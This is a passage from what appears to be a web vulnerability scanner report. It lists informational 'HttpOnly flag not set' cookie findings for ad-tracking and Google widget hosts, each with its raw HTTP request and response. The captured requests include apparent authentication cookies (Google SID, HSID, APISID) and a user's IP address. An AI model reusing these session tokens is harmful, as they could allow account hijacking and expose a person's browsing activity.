X!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!%=57oi!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Mon, 16-Sep-2013 00:52:13 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:52:13 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

12.60. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=113617&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:10:21 GMT
Expires: Sat, 17 Sep 2011 01:10:21 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh09/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Sun, 16-Sep-2012 01:10:21 GMT; Path=/
Content-Type: text/javascript
Content-Length: 297
Connection: close

document.write('<img height=\"1\" width=\"1\" style=\"border-style:none;\" alt=\"\" src=\"http://www.googleadservices.com/pagead/conversion/1045336492/?label=Zam9CPCCmAIQrKO68gM&amp;guid=ON&amp;script
...[SNIP]...

12.61. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316239631507&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D245022995%26epid%3D69978503%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5761718%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221519903_63671954_as3102_vew|374#1316221519820_135153353_as3104_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316221548433_135109402_as3106_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:05:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:05:48 GMT
Content-Length: 2744

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316221548433_135109402_as3106_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316221548433_135109402_as3
...[SNIP]...

12.62. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316221519820_135153353_as3104_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316221519820_135153353_as3104_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFr0JSFEUB2jll6FokOkJRuTESoChgOHZhFHFyr56udJulmz75__vU_MHffQECDISZkbNa322DFAIwaA5oy_x_UIEYmIipDp1HY12uzYbjgxNYWUnttUyjRyOhQkI-2NRcJlXxInLZuRQFRTjY-9LG2zwV4YBysPk6FGe5aXBTiIwhqG6My_FcWBIIZFvupzLfjpd1Gtdl_LKX1i_lGRhTFoS9tc_HSZAjAUVrhSTa2vpzebq99etwn60r-AgmAYiR894dp6kEBKioFVL1B2ENYkvnfEdRShpRRHdbAQqp_xLD7m_HvzvZVIRI6uUx7u0HOPLtj20BAAA=&act=vew&idx=[0]&rnd=1979613396&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221519820_135153353_as3104_imp|374#1316221519820_135153353_as3104_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316223879885_63879647_as3102_vew|374#1316223878425_135346010_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:44:39 GMT; Path=/tase
Date: Sat, 17 Sep 2011 01:44:39 GMT


12.63. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316221548433_135109402_as3106_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316221548433_135109402_as3106_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFD9ELkJRE0YB2Thm6Bo6OUFSujQQoChiO3QpFnFy9dOulE_XEz__Jr4_DU-3SEQiIYpSAzHIwQmQSQkF3-Ov53x5vFCCQBKuh1SFtYkfYePSNaPncP6AxBQV9KUNNx8hgct-0upbznBwCZJQMMduDMDvWkoiD1mWbj86BD-ZAGcgDWrbLY2fGMddb0S6hjv2e5Lx4IdH6OKfl3l_XeVrr9G1JwyU939-GdXwsOnT_jffFwGNsGKHV1zRPlh7saIjoTzoXwyjCdhoZdoYsIAgnfa9lui9zYu-QT7rcxmSrmGg0kQsenRPZPK79JXmOwNDoDyUMaFVtAQAA&act=vew&idx=[0]&rnd=1979642060&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548433_135109402_as3106_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316223959550_135292850_as3105_vew|374#1316223940878_135291324_as3105_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:45:59 GMT; Path=/tase
Date: Sat, 17 Sep 2011 01:45:59 GMT


12.64. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775029/8/923517/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:11 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a204
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 00:53:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-2; expires=Tue, 06-Nov-2012 16:53:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-o; expires=Tue, 06-Nov-2012 16:53:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.65. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=DF9qBZyty5yjGD3jvSxv1g

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRj6f-4AUlLipUgWN_wuO6t53nd9JmxbvZ_W-1oR-8-SaiPAdXRK4JXUtEp2wFxov7L7K2IUs0NN_D7fbCnl5hOor_vWa1l8eIYTgMZ62Ta0zFpO49zlHFwKxdLGNyk7lE5-OxMDws0Cv_cRzInX9ya84yTO0ELIyf4zh8DDmuFQtxahrdU1xrdlb6R-4-435VlRnljnEs8kNKwcSUW1o1Tnk3osBq0wHG-5tjyF7bmNf25vklS_SBSrTiYAeu-qLWAvysK-50K_ALHzITRWPKomo-6Dw-NTco8CdlnVBznEfI;Domain=.google.com;Path=/;Expires=Tue, 14-Sep-2021 00:52:21 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sat, 17 Sep 2011 00:52:21 GMT
Date: Sat, 17 Sep 2011 00:52:21 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

12.66. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p109848095&PRAd=70982068&AR_C=43901049 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Sat, 17 Sep 2011 01:05:23 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221523; expires=Sun 18-Sep-2011 01:05:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p109848095=exp=2&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 01:05:23 2011&prad=70982068&arc=43901049&; expires=Fri 16-Dec-2011 01:05:23 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p109848095&c3=70982068&c4=43901049&c5=&c6=2&c7=Sat%20Sep%2017%2000%3A57%3A53%202011&c8=&c9=&c10=&c15=&rn=1316221523
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


12.67. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1316220781.709,wait-%3E10000,&1316238867280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_G=method->-1,ts->1316220781; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:39 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.68. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=2&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:32 2011&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29309

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...

12.69. http://attuverseoffers.com/tv_hsi_bundles/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attuverseoffers.com
Path:   /tv_hsi_bundles/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O HTTP/1.1
Host: attuverseoffers.com
Proxy-Connection: keep-alive
